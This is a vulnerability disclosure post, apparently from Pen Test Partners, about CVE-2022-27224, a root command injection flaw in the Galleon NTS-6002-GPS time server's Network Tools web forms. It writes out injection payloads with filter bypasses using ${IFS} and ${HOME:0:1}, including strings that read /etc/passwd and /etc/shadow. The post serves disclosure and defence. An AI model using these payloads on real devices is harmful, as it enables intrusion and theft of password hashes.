Galleon Systems’ GPS NTP time server had a command injection vulnerability in the firmware of their NTS GPS device which could allow total control of the device through the web management interface.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27224
A vulnerability was discovered in Galleon NTS-6002-GPS 4.14.103-Galleon-NTS-6002.V12 #4. A low privilege authenticated attacker can perform command injection as the root user, by supplying shell metacharacters to forms on the Network Tools section of the web-management interface. All three networking tools are affected (Ping, Traceroute, and DNS Lookup) and their respective input fields (ping_address, trace_address, nslookup_address).
In the examples below, we are targeting one of the three vulnerable pages (in this case DNS Lookup). The vulnerable endpoint is “/tools/dolookup” and the parameter “nslookup_address”.
Example commands used to enumerate and perform command injection via the pages and injectable page parameters mentioned above (“buffer” is a chosen random input word expected by the application):
buffer&id;
buffer&id&whoami&ifconfig;
buffer&id&pwd&ls;
The underlying system did not allow some characters to be passed, these can be worked around using shell facilities. We can avoid the use of spaces by using the IFS shell variable (Input Field Separator):
buffer&cat${IFS}index.php
Forward slashes “/” were also not accepted. In bash these can be replicated by using variable substitution, such as ${HOME:0:1}. This extracts the first character for the HOME shell variables, which, as the variable is a full path, is equal to the "/" character. With these substitutions we can submit most shell commands, such as:
buffer&cat${IFS}${HOME:0:1}etc${HOME:0:1}passwd
buffer&cat${IFS}${HOME:0:1}etc${HOME:0:1}shadow
The final command injection string gets the local Un*x system's password hash file. This is only accessible with "root" level privileges on the device, and therefore highlights another issue of the web management UI server being run via the "root" administrative account rather than a more sensible choice such as "www-var" or "apache".
I found the vulnerability almost accidentally while doing other work. Wanting a change of focus I explored the web admin UI looking for basic vulnerabilities. Much to my surprise I found this device to be vulnerable.
Command injection on a GPS powered NTP device could in theory be quite devastating. Once "root" level privileged command execution is gained on the device, an attacker could gain control over the network time which could interfere with the Kerberos authentication protocol. This would be compounded if no backup NTP source is available.
The compromised device could be turned into an attacker's network persistence backdoor or even be used to disrupt SCADA / ICS systems reliant on accurate time. It is down to the attacker's creativity at this stage. Although if you are lucky, they might just exfiltrate the "root" account password and spray the network hoping to find password re-use.
At the time of writing the vendor was working on releasing a newer iteration of the device's software which would patch the identified security issues. However it has not yet been released, and to the best our knowledge the update has not been tested or verified.
The vendor attempted to deny that the webserver was running with "root" privileges. Here’s what they said to us:
This had us falling about laughing!
We disproved this crazy statement. There are two indications that the webserver was indeed running as the superuser “root”. Most importantly, the User Identifier (UID) returned when performing an “id” command returned a UID of value “0” which always indicates that the current user is a superuser and therefore the “root” user.
Furthermore, as seen in the screenshots above, it was possible to retrieve the “/etc/shadow” hash file that is typically only accessible by the “root” account or an account with delegated “root” privileges (e.g SUID).
The post Galleon NTS-6002-GPS Command Injection vulnerability (CVE-2022-27224) first appeared on Pen Test Partners.